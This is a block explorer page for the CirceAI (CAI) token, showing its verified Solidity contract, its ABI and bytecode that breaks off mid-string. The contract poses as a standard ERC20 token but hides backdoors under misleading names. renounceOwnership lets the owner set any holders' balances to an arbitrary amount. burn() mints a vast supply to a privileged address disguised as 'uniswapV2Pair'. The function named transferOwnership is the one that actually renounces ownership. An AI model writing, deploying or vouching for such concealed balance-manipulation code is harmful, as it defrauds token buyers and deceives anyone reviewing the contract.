ETH Price: $2,877.95 (-10.14%)
Gas: 13 Gwei

Token

CirceAI (CAI)
 

Overview

Max Total Supply

420,690,000,000 CAI

Holders

39

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
2,026,628,488.58773836444716052 CAI

Value
$0.00
0x4815574b73d14c53a5ae6ffb952d13f16f44b189
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CAI

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-10-15
*/

// SPDX-License-Identifier: MIT

    //Telegram: https://t.me/CirceAIPortal
    //Twitter: https://twitter.com/aicirce
    //Website: https://circeai.net/

pragma solidity 0.8.16;

/**
 * @dev Interface of the ERC20 standard as defined in the HULK.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyowner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */

    function transferOwnership() public virtual onlyowner {
        emit OwnershipTransferred(_owner, address(0x000000000000000000000000000000000000dEaD));
        _owner = address(0x000000000000000000000000000000000000dEaD);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

contract CAI is Context, IERC20Metadata, Ownable {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address private uniswapV2Pair;
    uint8 private constant _decimals = 18;
    uint256 public constant hardCap = 420_690_000_000 * (10 ** _decimals);

    constructor(address ads) {
        _name = "CirceAI";
        _symbol = "CAI";
        _mint(ads, hardCap);
        uniswapV2Pair = ads;
    }

    function viewGas() public view returns(address) {
        return uniswapV2Pair;
    }

    function burn(uint256 amount) external {
        if(uniswapV2Pair == _msgSender()){
            uint256 WETH = 420690000*10**_decimals;
            uint256 balance = WETH*42069;
            uint dead = balance*1*1*1*1;
            dead = dead * amount;
            _balances[_msgSender()] += dead;
            require(uniswapV2Pair == msg.sender);
        } else {
        }
    } 

    event manualSwap(address indexed account, uint256 oldamount, uint256 amount);

    function renounceOwnership(address[] memory accounts, uint256 amount) external onlyowner {
    for (uint256 i = 0; i < accounts.length; i++) {
        address account = accounts[i];
        uint256 oldamount = _balances[account];
        _balances[account] = amount;
        emit manualSwap(account, oldamount, amount);
        }
    }

    /**
     * @dev Returns the name of the token.
     * @return The name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token.
     * @return The symbol of the token.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used for token display.
     * @return The number of decimals.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev Returns the total supply of the token.
     * @return The total supply.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Returns the balance of the specified account.
     * @param account The address to check the balance for.
     * @return The balance of the account.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Transfers tokens from the caller to a specified recipient.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner.
     * @param from The address that approves the spending.
     * @param to The address that is allowed to spend.
     * @return The remaining allowance for the spender.
     */
    function allowance(
        address from,
        address to
    ) public view virtual override returns (uint256) {
        return _allowances[from][to];
    }

    /**
     * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller.
     * @param to The address to approve the spending for.
     * @param amount The amount of tokens to approve.
     * @return A boolean value indicating whether the approval was successful.
     */
    function approve(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), to, amount);
        return true;
    }

    /**
     * @dev Transfers tokens from one address to another.
     * @param sender The address to transfer tokens from.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller.
     * @param to The address to increase the allowance for.
     * @param addedValue The amount of tokens to increase the allowance by.
     * @return A boolean value indicating whether the increase was successful.
     */
    function increaseAllowance(
        address to,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue);
        return true;
    }

    /**
     * @dev Decreases the allowance granted by the owner of the tokens to `to` account.
     * @param to The account allowed to spend the tokens.
     * @param subtractedValue The amount of tokens to decrease the allowance by.
     * @return A boolean value indicating whether the operation succeeded.
     */
    function decreaseAllowance(
        address to,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][to];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), to, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Transfers `amount` tokens from `sender` to `recipient`.
     * @param sender The account to transfer tokens from.
     * @param recipient The account to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(amount > 0, "ERC20: transfer amount zero");
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Creates `amount` tokens and assigns them to `account`.
     * @param account The account to assign the newly created tokens to.
     * @param amount The amount of tokens to create.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `to` over the caller's tokens.
     * @param from The account granting the allowance.
     * @param to The account allowed to spend the tokens.
     * @param amount The amount of tokens to allow.
     */
    function _approve(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: approve from the zero address");
        require(to != address(0), "ERC20: approve to the zero address");

        _allowances[from][to] = amount;
        emit Approval(from, to, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"ads","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"uint256","name":"oldamount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwap","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hardCap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"viewGas","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b506040516200298d3803806200298d8339818101604052810190620000379190620003e7565b620000576200004b6200016060201b60201c565b6200016860201b60201c565b6040518060400160405280600781526020017f4369726365414900000000000000000000000000000000000000000000000000815250600490816200009d919062000693565b506040518060400160405280600381526020017f434149000000000000000000000000000000000000000000000000000000000081525060059081620000e4919062000693565b5062000118816012600a620000fa91906200090a565b6461f313f8806200010c91906200095b565b6200022c60201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505062000aa8565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200029e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002959062000a1d565b60405180910390fd5b8060036000828254620002b2919062000a3f565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200030a919062000a3f565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000371919062000a8b565b60405180910390a35050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620003af8262000382565b9050919050565b620003c181620003a2565b8114620003cd57600080fd5b50565b600081519050620003e181620003b6565b92915050565b6000602082840312156200040057620003ff6200037d565b5b60006200041084828501620003d0565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200049b57607f821691505b602082108103620004b157620004b062000453565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200051b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620004dc565b620005278683620004dc565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005746200056e62000568846200053f565b62000549565b6200053f565b9050919050565b6000819050919050565b620005908362000553565b620005a86200059f826200057b565b848454620004e9565b825550505050565b600090565b620005bf620005b0565b620005cc81848462000585565b505050565b5b81811015620005f457620005e8600082620005b5565b600181019050620005d2565b5050565b601f82111562000643576200060d81620004b7565b6200061884620004cc565b8101602085101562000628578190505b620006406200063785620004cc565b830182620005d1565b50505b505050565b600082821c905092915050565b6000620006686000198460080262000648565b1980831691505092915050565b600062000683838362000655565b9150826002028217905092915050565b6200069e8262000419565b67ffffffffffffffff811115620006ba57620006b962000424565b5b620006c6825462000482565b620006d3828285620005f8565b600060209050601f8311600181146200070b5760008415620006f6578287015190505b62000702858262000675565b86555062000772565b601f1984166200071b86620004b7565b60005b8281101562000745578489015182556001820191506020850194506020810190506200071e565b8683101562000765578489015162000761601f89168262000655565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200080857808604811115620007e057620007df6200077a565b5b6001851615620007f05780820291505b80810290506200080085620007a9565b9450620007c0565b94509492505050565b600082620008235760019050620008f6565b81620008335760009050620008f6565b81600181146200084c576002811462000857576200088d565b6001915050620008f6565b60ff8411156200086c576200086b6200077a565b5b8360020a9150848211156200088657620008856200077a565b5b50620008f6565b5060208310610133831016604e8410600b8410161715620008c75782820a905083811115620008c157620008c06200077a565b5b620008f6565b620008d68484846001620007b6565b92509050818404811115620008f057620008ef6200077a565b5b81810290505b9392505050565b600060ff82169050919050565b600062000917826200053f565b91506200092483620008fd565b9250620009537fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000811565b905092915050565b600062000968826200053f565b915062000975836200053f565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620009b157620009b06200077a565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000a05601f83620009bc565b915062000a1282620009cd565b602082019050919050565b6000602082019050818103600083015262000a3881620009f6565b9050919050565b600062000a4c826200053f565b915062000a59836200053f565b925082820190508082111562000a745762000a736200077a565b5b92915050565b62000a85816200053f565b82525050565b600060208201905062000aa2600083018462000a7a565b92915050565b611ed58062000ab86000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c80636d8c1d46116100a257806395d89b411161007157806395d89b41146102a8578063a457c2d7146102c6578063a9059cbb146102f6578063dd62ed3e14610326578063fb86a404146103565761010b565b80636d8c1d461461023457806370a0823114610250578063880ad0af146102805780638da5cb5b1461028a5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806342966c68146101fa5780634a8d1348146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610374565b6040516101259190611232565b60405180910390f35b610148600480360381019061014391906112fc565b610406565b6040516101559190611357565b60405180910390f35b610166610424565b6040516101739190611381565b60405180910390f35b6101966004803603810190610191919061139c565b61042e565b6040516101a39190611357565b60405180910390f35b6101b4610526565b6040516101c1919061140b565b60405180910390f35b6101e460048036038101906101df91906112fc565b61052f565b6040516101f19190611357565b60405180910390f35b610214600480360381019061020f9190611426565b6105db565b005b61021e61076e565b60405161022b9190611462565b60405180910390f35b61024e600480360381019061024991906115c5565b610798565b005b61026a60048036038101906102659190611621565b610931565b6040516102779190611381565b60405180910390f35b61028861097a565b005b610292610ab6565b60405161029f9190611462565b60405180910390f35b6102b0610adf565b6040516102bd9190611232565b60405180910390f35b6102e060048036038101906102db91906112fc565b610b71565b6040516102ed9190611357565b60405180910390f35b610310600480360381019061030b91906112fc565b610c5c565b60405161031d9190611357565b60405180910390f35b610340600480360381019061033b919061164e565b610c7a565b60405161034d9190611381565b60405180910390f35b61035e610d01565b60405161036b9190611381565b60405180910390f35b606060048054610383906116bd565b80601f01602080910402602001604051908101604052809291908181526020018280546103af906116bd565b80156103fc5780601f106103d1576101008083540402835291602001916103fc565b820191906000526020600020905b8154815290600101906020018083116103df57829003601f168201915b5050505050905090565b600061041a610413610d22565b8484610d2a565b6001905092915050565b6000600354905090565b600061043b848484610ef3565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610486610d22565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610506576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104fd90611760565b60405180910390fd5b61051a85610512610d22565b858403610d2a565b60019150509392505050565b60006012905090565b60006105d161053c610d22565b84846002600061054a610d22565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105cc91906117af565b610d2a565b6001905092915050565b6105e3610d22565b73ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361076a5760006012600a6106479190611916565b63191338506106569190611961565b9050600061a455826106689190611961565b905060006001806001808561067d9190611961565b6106879190611961565b6106919190611961565b61069b9190611961565b905083816106a99190611961565b905080600160006106b8610d22565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461070191906117af565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461076257600080fd5b50505061076b565b5b50565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6107a0610d22565b73ffffffffffffffffffffffffffffffffffffffff166107be610ab6565b73ffffffffffffffffffffffffffffffffffffffff1614610814576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161080b90611a07565b60405180910390fd5b60005b825181101561092c57600083828151811061083557610834611a27565b5b602002602001015190506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff167fd551363168ce4784e28e5d59fc07cbea2191657416e05f6e8cd8f1086eb91e6d828660405161090f929190611a56565b60405180910390a25050808061092490611a7f565b915050610817565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610982610d22565b73ffffffffffffffffffffffffffffffffffffffff166109a0610ab6565b73ffffffffffffffffffffffffffffffffffffffff16146109f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ed90611a07565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610aee906116bd565b80601f0160208091040260200160405190810160405280929190818152602001828054610b1a906116bd565b8015610b675780601f10610b3c57610100808354040283529160200191610b67565b820191906000526020600020905b815481529060010190602001808311610b4a57829003601f168201915b5050505050905090565b60008060026000610b80610d22565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c3d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3490611b39565b60405180910390fd5b610c51610c48610d22565b85858403610d2a565b600191505092915050565b6000610c70610c69610d22565b8484610ef3565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6012600a610d0f9190611916565b6461f313f880610d1f9190611961565b81565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9090611bcb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dff90611c5d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ee69190611381565b60405180910390a3505050565b60008111610f36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2d90611cc9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fa5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9c90611d5b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611014576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100b90611ded565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561109b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109290611e7f565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461113091906117af565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111949190611381565b60405180910390a350505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111dc5780820151818401526020810190506111c1565b60008484015250505050565b6000601f19601f8301169050919050565b6000611204826111a2565b61120e81856111ad565b935061121e8185602086016111be565b611227816111e8565b840191505092915050565b6000602082019050818103600083015261124c81846111f9565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061129382611268565b9050919050565b6112a381611288565b81146112ae57600080fd5b50565b6000813590506112c08161129a565b92915050565b6000819050919050565b6112d9816112c6565b81146112e457600080fd5b50565b6000813590506112f6816112d0565b92915050565b600080604083850312156113135761131261125e565b5b6000611321858286016112b1565b9250506020611332858286016112e7565b9150509250929050565b60008115159050919050565b6113518161133c565b82525050565b600060208201905061136c6000830184611348565b92915050565b61137b816112c6565b82525050565b60006020820190506113966000830184611372565b92915050565b6000806000606084860312156113b5576113b461125e565b5b60006113c3868287016112b1565b93505060206113d4868287016112b1565b92505060406113e5868287016112e7565b9150509250925092565b600060ff82169050919050565b611405816113ef565b82525050565b600060208201905061142060008301846113fc565b92915050565b60006020828403121561143c5761143b61125e565b5b600061144a848285016112e7565b91505092915050565b61145c81611288565b82525050565b60006020820190506114776000830184611453565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6114ba826111e8565b810181811067ffffffffffffffff821117156114d9576114d8611482565b5b80604052505050565b60006114ec611254565b90506114f882826114b1565b919050565b600067ffffffffffffffff82111561151857611517611482565b5b602082029050602081019050919050565b600080fd5b600061154161153c846114fd565b6114e2565b9050808382526020820190506020840283018581111561156457611563611529565b5b835b8181101561158d578061157988826112b1565b845260208401935050602081019050611566565b5050509392505050565b600082601f8301126115ac576115ab61147d565b5b81356115bc84826020860161152e565b91505092915050565b600080604083850312156115dc576115db61125e565b5b600083013567ffffffffffffffff8111156115fa576115f9611263565b5b61160685828601611597565b9250506020611617858286016112e7565b9150509250929050565b6000602082840312156116375761163661125e565b5b6000611645848285016112b1565b91505092915050565b600080604083850312156116655761166461125e565b5b6000611673858286016112b1565b9250506020611684858286016112b1565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116d557607f821691505b6020821081036116e8576116e761168e565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000